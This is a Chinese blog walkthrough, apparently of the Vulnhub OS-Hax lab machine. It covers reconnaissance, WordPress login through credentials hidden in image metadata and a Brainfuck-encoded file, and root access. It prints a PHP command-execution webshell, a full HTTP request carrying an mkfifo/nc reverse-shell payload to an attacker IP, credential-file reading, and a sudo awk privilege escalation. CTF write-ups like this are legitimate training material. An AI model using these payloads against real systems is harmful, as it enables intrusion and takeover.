OS-Hax 靶机

已于 2024-07-30 16:04:05 修改
阅读量307 收藏 5
点赞数 3
文章标签: web安全
于 2024-07-30 16:03:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62162207/article/details/140799287
版权

一、信息收集

nmap 192.168.7.0/24进行主机扫描,查找到主机IP地址

进行目录扫描

发现一个wordpress路径,可以打开,以及好几个子目录

在img路径下,有一个flaghost.png,引起注意

二、内网渗透

在wordpress路径下,发现点击功能点会发生跳转,且跳转路径会变成localhost

所以我们来到burp,将localhost和靶机地址192.168.7.51进行匹配,这样当流量走burp时就会自动将localhost匹配成靶机地址192.168.7.51

打开burp的proxy setting—>Match and replace rules—>Add,添加响应头和响应体将localhost与192.168.7.51绑定

再次访问,页面发生变化

打开登陆页面

在进行尝试登陆爆破,弱口令。SQL注入无解后,来到刚刚看到的img路径下的flaghost.png,kali远程下载图片文件

下载一个exiftool工具进行图片编辑

发现了一个类似于密码的字符

尝试登陆,登陆失败,尝试远程连接,连接失败

猜想他并不是一个密码,也有可能是一个路径,拼接访问,成功打开

点击文件,在flag2.txt文件中发现了一个字符串

发现是Brainfuck加密,进行Brainfuck解密

再次尝试登陆,登陆成功

尝试写入webshell,写入成功,点击连接,连接失败

换种方式,写入一个执行命令

system($_REQUEST['hws']);

URL拼接执行命令使用,可以执行

抓包,写入反弹shell命令

POST /wordpress/ HTTP/1.1
Host: 192.168.7.51
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

hws=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.7.252+443+>/tmp/f

反弹成功,执行如下代码

python -c 'import pty;pty.spawn("/bin/bash")'

查看目录下文件

在wp-config.php里找到了一个数据库,以及账号密码

查看/etc/passwd下的文件

看到web用户,使用之前密码登陆,登陆成功

三、权限提升

sudo -l 查看用户权限,发现可以执行awk命令,awk命令可以执行系统命令,sudo awk '{ system("/bin/bash")}' ,获得root权限

拿到flag

下届免单用户
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Schlauer-Hax
03-17
你好呀! :hourglass_not_done: {████████████████░░░░░░░░░░░░░░}-55.07%-月进度 :hourglass_not_done: {██████░░░░░░░░░░░░░░░░░░░░░░░░}-20.69...
XF86Config-hax-开源
05-03
标题中的“XF86Config-hax-开源”表明这是一个与开源相关的项目,主要涉及X Window系统中的XF86Config配置文件。在X Window系统中,XF86Config(或者在某些较新版本中称为xorg.conf)是控制图形适配器(即显卡)和...
Os-Hax靶机测试
weixin_58729813的博客
04-08 268
本文是针对vulnhub靶机测试,拿到两个flag即可
Hacknos-OS-Hax靶机
m0_61995767的博客
07-14 472
Hacknos-OS-Hax打靶记录
os-hax靶机
weixin_73074638的博客
07-12 215
访问发现页面不正常,url会跳转到locahost下修改host和域名之间的绑定重新访问还是不正常burp设置代理匹配规则再去尝试发现页面正常了发现参数,测试之后没有SQL注入再去拼接刚刚发现的后台尝试弱口令爆破未能登录点击下面返回jrahul页面整个翻译一下,发现有个用户是web,猜解不出密码这时候回退到刚刚目录扫描有一个/img文件,访问有一个flaghostpng下载下来使用strings命令与exiftool工具查询flaghost.png中的关键字 passw@45。
靶机Os-Hax测试笔记
qq_56426046的博客
01-05 500
下载ova文件,直接virtual Box打开,可能出现一些问题,关闭USB选择网络模式等等。网络用桥接,开启过程没有失败,可以访问网站代表搭建成功。首先编辑 vi /etc/hosts 192.168.1.102 localhost 访问。访问目录 /img/发现存在目录写浏览。修改/etc/sudoers 文件。修改/etc/sudoers 文件。切换 python shell。
2021-06-13OS-Hax靶机学习
qq_45290991的博客
06-13 428
靶机地址 难度:初级 靶机发布日期:2019年11月1日 靶机描述:Contact… https://www.linkedin.com/in/rahulgehlaut/ For any Error This works better in VirtualBox than VM...
vulnhub靶机 Os-Hax
qq_52178795的博客
06-18 105
本篇重点,反弹shell awk提权
Hacknos-OS-Hax靶机渗透测试
weixin_58786230的博客
07-12 262
【代码】Hacknos-OS-Hax靶机渗透测试。
Vulnhub-Os-hax
wwxxss
03-16 150
使用strings查看图片的信息 strings 命令在对象文件或二进制文件中查找可打印的字符串。gobuster dir -iu "http:192.168.56.106/" -w 字典 -x 格式( html,txt,bak,php)根据提示我们可以发现是一个wordpress站点,所以我们可以扫描wordpress站点下的目录。结果并没有什么发现,通过wp发现在根目录下有个img目录有个flaghost.png,我们使用。得到了一个brainfuck加密的密码,我们丢到解密网站解开查看。
靶机渗透日记 hackNos: Os-Hax
Anonymous
02-07 245
靶机地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 文章目录信息收集Getshell方法一方法二提权参考链接 信息收集 ip 端口 目录扫描 发现存在 wordpress 使用 wpscan 发现存在 web 用户 没有发现插件 在 /img 目录下存在 flaghost.png 用exiftool查看了一下图片信息 exiftool flaghost.png 可能是 web 用户的密码,尝试后发现是路径
Steak-Hax:TDC制造的Minecraft骇客客户端
03-07
牛排骗局 网站: : (会添加很多东西) 什么是牛排骗局? Catch-21是Minecraft 1.8被黑的客户端! ... 对于旧版本,请 推荐的纹理包 , Windows: 要进行安装,请按WINDOWKEY + R并在其中粘贴%appdata%/。...
Yak-Hax:通过Java的YikYakAPI接口
05-12
k牛哈克斯Yak Hax是Java中Yik Yak API的非官方vwrapper。下载与安装Yak Hax没有Maven存储库。 为了下载该库,您可以克隆或下载该存储库,位于releases / release.jar下,并将其包含在您的构建路径中。 否则,只需在...
restored-external-hax:更容易构建xerub的sshrd
05-07
restore_external_hax 这基本上是的一个。 我之所以没有派遣它,只是因为我的版本使用了src /文件夹等。 所有这些不同的是将设备上的SSH端口从2222更改为22。哦,是的,这也使它的编译更加容易,并且为您完成了很多...
微软蓝屏事件揭示的网络安全深层问题与未来应对策略
最新发布
RenGJ010617的博客
08-04 567
最近,由微软视窗系统软件更新引发的全球性“微软蓝屏”事件成为了科技界的头条新闻。此次事件的根源是美国电脑安全技术公司“众击”提供的一个带有严重缺陷的软件更新,该更新在全球范围内导致约850万台设备崩溃,跨越航空、医疗、传媒等多个关键行业,严重影响了全球运输、服务和安全
web安全之简要sql注入
weixin_73185660的博客
08-01 965
举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。如果是1=1,那么就是真且真,结果为真。
C++在网络安全领域的应用
2302_79331124的博客
08-04 452
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 477
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
[WinError 5] 拒绝访问。: 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\pip-unpack-1hax6tn4\\notebook-7.0.3-py3-none-any.whl'
09-04
[WinError 5] 拒绝访问是一个错误消息,意味着你没有足够的权限来访问或操作指定的文件或目录。这个错误通常发生在你试图安装或卸载Python包时。根据引用和引用的信息,建议你尝试以下方法来解决这个问题: 1. 使用--user选项: 在安装或卸载包时,使用--user选项可以将包安装到当前用户的目录中,而不是全局目录。这通常可以避免权限问题。示例命令如下: ``` pip install package_name --user ``` 2. 检查权限: 确保你拥有足够的权限来访问指定的文件或目录。可以尝试以管理员身份运行命令提示符或终端,并使用管理员权限运行安装或卸载命令。 另外,引用提供了一些解决Python PermissionError: [WinError 5]拒绝访问问题的步骤,你也可以参考这个参考资料来解决你的问题。希望这些方法对你有所帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [python更新库遇到ERROR: [WinError 5] 拒绝访问。Consider using the `--user` option or check the ...](https://blog.csdn.net/sophiasofia/article/details/129739335)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ERROR: Could not install packages due to an OSError: [WinError 5] 拒绝访问。: ‘C:\\Users\\zlr\\App...](https://blog.csdn.net/zlrhhh/article/details/127915930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [三步解决python PermissionError: [WinError 5]拒绝访问的情况](https://download.csdn.net/download/weixin_38557095/12852977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值